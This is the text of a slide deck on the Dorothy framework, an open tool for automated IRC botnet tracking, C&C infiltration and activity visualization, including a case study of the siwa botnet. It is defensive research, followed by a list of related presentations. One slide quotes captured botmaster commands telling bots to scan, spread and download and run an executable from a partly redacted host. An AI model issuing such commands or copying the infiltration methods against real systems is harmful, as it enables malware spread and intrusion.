an open botnet analysis framework for an open botnet
play

An Open Botnet Analysis Framework for An Open Botnet Analysis - PowerPoint PPT Presentation

Nov 18, 2023 •33 likes •393 views

An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization marco riccardi Italian Chapter - The Honeynet Project marco cremonini

  1. An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization marco riccardi – Italian Chapter - The Honeynet Project marco cremonini – Dept. of Information Technology – Università di Miliano

  2.  Defining the problem : IRC botnets  Defining the goal to achieve  The proposed solution: The Dorothy Framework  The Realized proof of concept: honey-dorothy  Results  Case study: siwa botnet  Workplan  Conclusions

  3.  Botnets are considered one of the most dangerous threat ◦ Hard to keep pace with their evolutions ◦ Hard to protect against their attacks ◦ Hard to mitigate  Time between Command and Center (C&C) identification and botnet mitigation is tipically too long  Technical issues  Legal issues

  4.  Mitigation plan should be as quick as possible  Automation is required  …otherwise, human interaction is needed ◦ Considering social context (legal, culture, etc) ◦ All the contermeasures provided by ISP/LEO (blacklisting, dns update,etc) are to be closely justified before its execution.

  5.  A mitigation plan should be as quick as possible  Automation is required  …otherwise, human interaction is needed ◦ Considering social context (legal, economic, oprational, etc.) ◦ All contermeasures provided by ISP/LEO (blacklisting, DNS update,etc) must be clearly justified before their implementation Developing a framework that automatically provide all information needed by an ISP/LEO to activate a mitigation strategy

  6.  Automated framework for IRC botnet analysis ◦ Automatic Malware acquisition & analysis ◦ Automatic C&C IRC channel infiltration ◦ Automatic reporting activity status  Interactive graphic front-end  Real time information about monitored C&Cs ◦ Defenders can use these information to develop timely countermeasures to mitigate the risks  Customizable ◦ Defenders could be alerted when a botnet activity is detected in their network

  7.  Malware Collection Module  Virtual Honeypot Injection Module  Network Analysis Module  Data Extraction Module

  8.  Infiltration Module  Geolocation Module  Live Data Extraction Module  Data Visualization Module  Web Graphical User Interface

  9.  Proposed proof of concept  Developed using bash scripting language ◦ Fully compatible with POSIX systems ◦ Fully automatized  Developed to be modular ◦ Easy integration with other tools ◦ Customizable  90% of its components are open source  The Virualization Module has been developed on VMware  A migration to VirtualBox is ongoing

  10.  Low interaction honeypots ( nepenthes )  All honeypots upload their malwares to a central malware repository  Recently has been added the support to the Mwcollect Alliance repository  A malware analysis module (static/dynamic) integration is ongoing.

  11.  The virtualization enviroment has been developed on VMware enviroment  vmtools support the scripting implementation  The malware is executed on a virtual machine (Win XP SP2)  After three minutes the VM is reverted to its original snapshot

  12.  Inspect zombies network behavior during the three minutes of infected VM execution  The network traffic is sniffed by tcpdump tool  The output is stored into a dump file and sent to the next module

  13.  The goal of this module is to extract all relevant information about C&Cs  Extracted information are used for botnet classification ◦ C&C IP addresses ◦ C&C Satellites ◦ Hostname associated ◦ Hostname resolved by DNS servers

  14.  Infiltrate, Observe, Report  IRC-drone ◦ Full bash encoded ◦ Multichannel support ◦ Auto-respond to PING request ◦ The drone injects all the IRC commands extracted from the traffic generated by VM zombies as is.  Compatible to non IRC-compliant C&C  The connection toward the C&C is anonymized through the TOR network

  15.  All the data received and sent to C&Cs are logged into txt files  Instant notification by email when : ◦ Topic changement ◦ New command issued by bot master ◦ MODE option modification  A full module re-engineerization is ongoing ◦ Multiplatform ◦ Support for more onion networks

  16.  Geolocation information give an approximated geographical location of C&Cs ◦ Can be useful to consider the social contex  Useful for understanding which law officer notify  Provided by GeoCityLite  Free, good approximation

  17.  All log files generated by the IRC-drone are parsed ◦ Topics extraction ◦ Botmaster nickname/user host extraction ◦ Time delay calculation  Between each topic modification  Between each PING request (i.e. heartbeat )

  18. Parameter IPs Hosts Ports Zombies Malwares Chans Satellites ALL-Hosts Mail Addr

  19. Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

  20. Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

  21. Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

  22. “Overview first ,zoom and filter, then details on-demand ” B. Shneiderman. The eyes have it: A task by data type taxonomy for information visualizations.

  23.  Tested for a period of 27 days between January and March 2009  Two public IPs used for malware acquisition  3900 malware downloaded ◦ 304 unique ◦ 562,657 Mb downloaded  16 unique C&C classified ◦ 50 IRC channels monitored  8992 unique pubblic IPs indentified as zombies

  24.  Formed by 5 C&C servers ◦ 2 Located in China ◦ 2 Located in Canada ◦ 1 Located in Holland  7 Different channel names used ◦ #siwa was the most used  37 different C&C satellites providing botnet updating service through HTTP  42 host names related to siwa IP addresses  4346 unique IP addesses identified as zombies

  26.  Redesignment of the information flow management ◦ Information repository stored into relational database  Evaluate the developing of the core engine by means of other programming languages  Integration of a malware analysis module ◦ Dynamical & Static analysis  Virtual Honeypot: migration to VirtualBox

  27.  New module design and realization o A module for analyzing P2P botnets o A spam-trap implementation is ongoing  Development of a new IRC Drone ◦ Multiplatform, distribuited

  28.  Data visualization tuning ◦ Investigating new ways for representing botnet data  Developing a new web interface o More dynamic o Multi-user / user customizable  Improve the notification process o Mailing list o Web 2.0 comunication channels (twitter, feeds, blogs, ..)

  29.  The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter  Today, there are different countributors supporting the project: ◦ Two reserchers of the University of Pavia are contributing by integrating their own botnet analysis tools ( H.I.V.E ) with honey-doroty ◦ Three students from the University of Milan are developing new malware analysis modules ◦ The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework

  30.  The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter  Today, there are different countributors supporting the project: ◦ Two reserchers of the University of Pavia are contributing by integrating their own botnet analysis tools ( H.I.V.E ) with honey-doroty ◦ Three students from the University of Milan are developing new malware analysis modules ◦ The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework ….we hope to receive your supports too!

  32. The Italian Honeynet Chapter – www.honeynet.it marco riccardi – marco.riccardi [at] honeynet [dot] it marco cremonini – marco.cremonini [at] unimi [dot] it

  33.  Botmaster execution request ##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e –s  Zombies response 72.xxx.xxx.xxx:2293 --> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread 72.xxx.xxx.xxx:2293 --> :Tdkzdtwh!~bxoluj@mna75- 4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :- 04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete

  34. • Bar chars Number of DNS query executed by analized malware,grouped by C&C • Pie chars Number of DNS query

  35. • Topic activity • C&C heart-beat Time avarege between TOPIC Time avarege between two PING changement request

  36.  A full module re-engineering is ongoing  The new drone will be multiplatform  Anyone can support the infiltration process  It will support more than one onion network  It will send its log to a central log concentrator  Integrity and confidentiality have to managed accurately

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet

MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet

MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet A Botnet is a software that is designed to perform simple automated and usually cyclical operations. Botnet management is performed remotely

507 views • 24 slides
FRAMEWORK FOR BOTNET EMULATION AND ANALYSIS A Thesis Presented to The Academic Faculty by

FRAMEWORK FOR BOTNET EMULATION AND ANALYSIS A Thesis Presented to The Academic Faculty by

FRAMEWORK FOR BOTNET EMULATION AND ANALYSIS A Thesis Presented to The Academic Faculty by Christopher Patrick Lee In Partial Fulfillment of the Requirements for the Degree Doctor of Philosophy in the School of Electrical and Computer

1.09k views • 106 slides
A Framework for Understanding Botnets Justin Leonard, Shouhuai Xu, Ravi Sandhu University of T

A Framework for Understanding Botnets Justin Leonard, Shouhuai Xu, Ravi Sandhu University of T

A Framework for Understanding Botnets Justin Leonard, Shouhuai Xu, Ravi Sandhu University of T exas at San Antonio Overview Botnet Lifecycle Botnet Architecture Command and Control Mechanisms (C&C) Dynamic Graph Model Botnet

195 views • 18 slides
Dawn Song dawnsong@cs.berkeley.edu 1 What is a botnet? An army of compromised hosts

Dawn Song dawnsong@cs.berkeley.edu 1 What is a botnet? An army of compromised hosts

Botnet Analysis & Defense Dawn Song dawnsong@cs.berkeley.edu 1 What is a botnet? An army of compromised hosts (bots) coordinated via a command and control center (C&C). The perpetrator is usually called a botmaster.

409 views • 11 slides
Welcome to Storm ! The Storm botnet Reachability check Overnet (UDP) The Storm botnet

Welcome to Storm ! The Storm botnet Reachability check Overnet (UDP) The Storm botnet

Welcome to Storm ! The Storm botnet Reachability check Overnet (UDP) The Storm botnet Botmaster Hosted infrastructure HTTP proxies HTTP Proxy Infected machines bots TCP Workers The Storm botnet Botmaster Hosted infrastructure HTTP

517 views • 31 slides
A Date with Data Botnet Command and Control Through Tinder A Date with Data Botnet Command and

A Date with Data Botnet Command and Control Through Tinder A Date with Data Botnet Command and

A Date with Data Botnet Command and Control Through Tinder A Date with Data Botnet Command and Control Through Tinder (Almost) $whoami Nathaniel Beckstead Interests Blue team Homelab Network Security Find Me github.com/becksteadn

500 views • 22 slides
Threat analysis of a Cellular Botnet regarding DoS attacks (Bedrohungsanalyse von

Threat analysis of a Cellular Botnet regarding DoS attacks (Bedrohungsanalyse von

Lehrstuhl fr Netzarchitekturen und Netzdienste Institut fr Informatik Technische Universitt Mnchen Threat analysis of a Cellular Botnet regarding DoS attacks (Bedrohungsanalyse von Mobilfunk-Botnetzen im Hinblick auf DoS-Angriffe)

311 views • 20 slides
Botnets Leonidas Stylianou CS 682 23/04/2020 Lifecycle of a bot Infected host Botnet malware

Botnets Leonidas Stylianou CS 682 23/04/2020 Lifecycle of a bot Infected host Botnet malware

Botnets Leonidas Stylianou CS 682 23/04/2020 Lifecycle of a bot Infected host Botnet malware Botmaster controls becomes a bot and infects a host. the botnet. joins the botnet . Coordination of f bots with C&C server Bots query the

1k views • 58 slides
BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet

BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet

BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection Guofei Gu 1,2 , Roberto Perdisci 3 , Junjie Zhang 1 , and Wenke Lee 1 1 Georgia Tech 3 Damballa, Inc. 2 Texas A&M University 2008-7-31

549 views • 22 slides
Take a deep breath: a Stealthy, Resilient and Cost-Effective Botnet Using Skype Antonio Nappa -

Take a deep breath: a Stealthy, Resilient and Cost-Effective Botnet Using Skype Antonio Nappa -

Introduction Advantages Skype Supernodes Botnet Our Model Features Communication protocol Experiments Limitations Countermeasures Take a deep breath: a Stealthy, Resilient and Cost-Effective Botnet Using Skype Antonio Nappa - Universit`

483 views • 16 slides
Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet Stephen Herwig Katura Harvey

Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet Stephen Herwig Katura Harvey

Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet Stephen Herwig Katura Harvey George Hughey Richard Roberts Dave Levin University of Maryland The Max Planck Institute + for Software Systems Rise of IoT Botnets

569 views • 52 slides
Network Security: Botnet Seungwon Shin GSIS, KAIST many slides from Dr. Yan Chen Definition Bot

Network Security: Botnet Seungwon Shin GSIS, KAIST many slides from Dr. Yan Chen Definition Bot

Network Security: Botnet Seungwon Shin GSIS, KAIST many slides from Dr. Yan Chen Definition Bot a software application that runs automated tasks over the Internet Botnet a collection of Internet-connected programs communicating with other

659 views • 39 slides
Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, R. Krej, J. Vykopal,

Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, R. Krej, J. Vykopal,

Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, R. Krej, J. Vykopal, M. Draar {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz The sixth European Conference on Computer Network Defense EC2ND

691 views • 50 slides
Challenges in Experimenting with Botnet Detection Systems Adam J. Aviv Andreas Haeberlen

Challenges in Experimenting with Botnet Detection Systems Adam J. Aviv Andreas Haeberlen

Challenges in Experimenting with Botnet Detection Systems Adam J. Aviv Andreas Haeberlen University of Pennsylvania August 8th, 2011 CSET-2011 1 Alice has developed a new botnet detector!!! What should the evaluation show? Alice's

767 views • 42 slides
Botnet Detection and Response The Network is the Infection David Dagon dagon@cc.gatech.edu

Botnet Detection and Response The Network is the Infection David Dagon dagon@cc.gatech.edu

Motivation/Overview Taxonomy Detection Response Botnet Detection and Response The Network is the Infection David Dagon dagon@cc.gatech.edu Georgia Institute of Technology College of Computing OARC Workshop, 2005 David Dagon Botnet

675 views • 45 slides
BotSniffer: Detecting Botnet Command and Control Channels in Network Traffic Guofei Gu, Junjie

BotSniffer: Detecting Botnet Command and Control Channels in Network Traffic Guofei Gu, Junjie

BotSniffer: Detecting Botnet Command and Control Channels in Network Traffic Guofei Gu, Junjie Zhang, and Wenke Lee College of Computing Georgia Institute of Technology 2008-2-25 Guofei Gu NDSS08 BotSniffer: Detecting Botnet C&C

379 views • 27 slides
of Sandboxed Phishing Kits Summary Motivation Sandboxed phishing kits Implementation Results

of Sandboxed Phishing Kits Summary Motivation Sandboxed phishing kits Implementation Results

PhishEye: Xiao Han Nizar Kheir Live Monitoring Davide Balzarotti of Sandboxed Phishing Kits Summary Motivation Sandboxed phishing kits Implementation Results [APWG Phishing Activity Trends Report 2 nd Quarter 2016] All time high record

921 views • 59 slides
Investor Presentation August 12, 2019 Safe Harbour Disclosure: Forward-looking Information 2

Investor Presentation August 12, 2019 Safe Harbour Disclosure: Forward-looking Information 2

Investor Presentation August 12, 2019 Safe Harbour Disclosure: Forward-looking Information 2 Leading Canadian Media and Content Company Great portfolio of assets Leader in Canadian broadcasting Powerful brands and content Valuable

338 views • 21 slides
Roadmap Presentation Ruth Wells Head of Engineering Introduction Recent Achievements

Roadmap Presentation Ruth Wells Head of Engineering Introduction Recent Achievements

Roadmap Presentation Ruth Wells Head of Engineering Introduction Recent Achievements Plans for 2013 Mobile Shibboleth Federations Fine Grained Access Control COUNTER 4 Discussion Relating to 2014 Recent

658 views • 46 slides
ENERGY OPTIMIZATION March 20, 2019 PRESENTATION OBJECTIVES Provide summary of elements

ENERGY OPTIMIZATION March 20, 2019 PRESENTATION OBJECTIVES Provide summary of elements

ENERGY OPTIMIZATION March 20, 2019 PRESENTATION OBJECTIVES Provide summary of elements Consultants view are most essential to the energy optimization framework Demonstrate alignment of PAs and Consultants on most of these elements

469 views • 11 slides
What do we know? What can we measure? Martin Eling OECD Expert Workshop, May 13, 2017

What do we know? What can we measure? Martin Eling OECD Expert Workshop, May 13, 2017

Cyber Risk and Cyber Risk Insurance: What do we know? What can we measure? Martin Eling OECD Expert Workshop, May 13, 2017 Management Summary Research Approach: Overview of the main research topics in the fields of cyber risk and

579 views • 12 slides
NETWORK DEFENCE STRATEGY EVALUATION: SIMULATION VS. LIVE NETWORK Tuesday 9 th May, 2017 Jana

NETWORK DEFENCE STRATEGY EVALUATION: SIMULATION VS. LIVE NETWORK Tuesday 9 th May, 2017 Jana

NETWORK DEFENCE STRATEGY EVALUATION: SIMULATION VS. LIVE NETWORK Tuesday 9 th May, 2017 Jana Medkov Martin Husk, Martin Draar Introduction optimal strategy to defend network infrastructure no standard for benchmarking Network Defence

574 views • 18 slides
Introduction to Malicious Web Sites Ktcl Web Sitelerine Bir lk Bak Ali Ikinci

Introduction to Malicious Web Sites Ktcl Web Sitelerine Bir lk Bak Ali Ikinci

OWASP T urkey - Uygulama Gvenlii Gn Introduction to Malicious Web Sites Ktcl Web Sitelerine Bir lk Bak Ali Ikinci Siber Gvenlik Dernei ali@ikinci.info 9 June 2012 Turkey About Me Working on Malicious Web Sites

505 views • 31 slides
Measuring the Performance and Effectiveness of Critical security controls William Makatiani

Measuring the Performance and Effectiveness of Critical security controls William Makatiani

Measuring the Performance and Effectiveness of Critical security controls William Makatiani Name Here About Serianu Limited Serianu is a Pan Africa based Cyber Security and business consulting firm. We are an award winning company in the

759 views • 46 slides

More recommend